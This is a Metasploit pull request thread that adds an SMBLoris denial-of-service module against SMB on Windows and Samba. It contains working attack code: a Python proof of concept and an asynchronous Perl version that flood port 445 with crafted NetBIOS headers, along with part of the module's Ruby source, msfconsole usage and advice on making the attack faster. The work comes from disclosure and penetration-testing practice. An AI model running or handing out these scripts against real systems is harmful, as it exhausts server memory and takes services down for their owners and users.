### PR TITLE
SMBLoris Denial of Service Module

### PR DESCRIPTION
**Pull request by thelightcosine**
## Vulnerable Application

  This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
  Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
  See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
  
  The module opens over 64,000 connections to the target service, so please make sure
  your system ULIMIT is set appropriately to handle it. A single host running this module
  can theoretically consume up to 8GB of memory on the target.

## Verification Steps

  Example steps in this format (is also in the PR):

  1. Start msfconsole
  1. Do: `use auxiliary/dos/smb/smb_lorris`
  1. Do: `set RHOST [IP]`
  1. Do: `run`
  1. Target should allocate increasing amounts of memory.

### 

```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

### CODE REVIEW

**Comment by zerosum0x0** [comment]
The original PoC @jennamagius and I sent to MSRC was nick-named the juggler because of the way it cycled through the sockets. It was so effective at sustaining the attack we never bothered to improve upon it (in fact it's what we demo'd at DEF CON). Well, we did also make an IPv6 version.

I'll post it now since there's a C implementation by @marcan that is probably better anyways.

```
import sys
import socket
import resource

rhost = sys.argv[1]
rport = sys.argv[2]

resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))

sks = {}

while True:
	for lport in range(1, 65536):
		try:
			if lport in sks:
				sks[lport].close()
			
			sk = socket.socket()
			sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
			sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
			sk.bind(('0.0.0.0', lport))
			sk.connect((rhost, int(rport)))
			sk.send('\x00\x01\xff\xff')

			sks[lport] = sk

		except Exception as e:
			print("%s - Port: %d" % (str(e), lport))
```

**Comment by marcan** [comment]
@zerosum0x0 Ah, I suspected you were using plain sockets in your PoC (since Scapy is so bad) :)

The main issue with that approach is it only works for low-RTT environments (i.e. a LAN). Once you get a higher ping time that will throttle the speed at which you can make connections. That's fixable making the sockets asynchronous, but then you run into the single source IP limit if you want to eat more than 8GB of RAM (at which point you could run multiple instances in network namespaces or bound to different source IPs, though).

**Comment by mubix** [comment]
If there is a C version I would love to see this as an extension to Meterpreter so it can be done victim side since I doubt it could work over a pivot very well. Definitely worth testing..

**Comment by jinq102030** [comment]
Ran the python PoC that @zerosum0x0's PoC posted against the a windows host (with 2GB of Ram), the memory goes up from 700MB to 1.95GB and it stayed that way for dozens of minutes even after the python program is stopped. That's very nice.

 @marcan has a good point, the speed of socket creation heavily depend on RTT of network if the sockets are created sequentially.

**Comment by jinq102030** [comment]
Created a perl PoC that creates the sockets asynchronously thanks to the perl AnyEvent package (my favorite).   The number "50" in this PoC is the concurrency:  how many sockets to start at a time. 

 ```
use AnyEvent;
use EV;
use AnyEvent::Socket;
use AnyEvent::Handle;

my $ctxs = {};
my $count = 0;
my $w = AnyEvent->condvar;

my $max = 30000;
my $i;
for ($i=0; $i<50; $i++) {
	kickoff();
}

$w->recv;

sub kickoff {
	#print "count=$count\n";
	if (($count % 1000) == 0) {
		print "$count\n";
	}
	if ($count > $max) { 
		if ($warned == 0) {
			$warned = 1;
			printf("got to $max\n");
		}
		return; 
	}
	$count ++;
	my $hd;
	$hd = new AnyEvent::Handle 
		connect => ["10.6.0.203", 445],
		on_connect => sub {
			my $hdl = shift;
			#print "got a connection\n";
			$hdl->push_write("\x00\x01\xff\xff");
			kickoff();
		},
		on_read => ::dummy1,
		on_error=> ::dummy1;
	$ctxs->{$hd} = {sock => $hd};
}

sub dummy1 {
	my $hdl = shift; $hdl->rbuf = "";
}
```

**Comment by recherpoi** [comment]
@zerosum0x0 About the script , I keep Getting "[errno 99] cannot assign requested address" any ideas why it is happening ?

**Comment by pbarry-r7** [comment]
Verified against a Windows 7 VM:

screen shot 2017-08-09 at 3 20 22 pm

Couple of [minor tweaks](https://github.com/rapid7/metasploit-framework/pull/8796/commits/901a1fdd1b747fc6b77b3e293b448ac89ca6590d), will land once Travis gives it a thumbs up...  👍

File: modules/auxiliary/dos/smb/smb_loris.rb [hunk 1]
```diff
@@ -0,0 +1,89 @@
...
+  def run
+    header = NbssHeader.new
+    header.message_length = 0x01FFFF
+
+    linger = Socket::Option.linger(true, 60)
+
+    while true do
+      sockets = {}
+      (1025..65535).each do |src_port|
+        print_status "Sending packet from Source Port: #{src_port}"
```
Comment (zerosum0x0) [inline modules/auxiliary/dos/smb/smb_loris.rb]: Recommend changing to vprint_status, because shell I/O increases time for the attack.

Comment (pbarry-r7) [inline modules/auxiliary/dos/smb/smb_loris.rb]: Good point, @zerosum0x0.  I believe there's also a couple of other tweaks we're considering, landing this for now (due to popular demand).

**Comment by alrosenthal-r7** [comment]
# Release Notes

The ability to cause a Denial of Service condition on any Windows machine with SMB exposed or any Linux system running Samba has been added. The auxiliary/dos/smb/smb_loris module takes advantage of a vulnerability in the NetBIOS Session Service Header for SMB. The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target.

**Comment by pbarry-r7** [comment]
TY, @alrosenthal-r7!

**Pull request merged**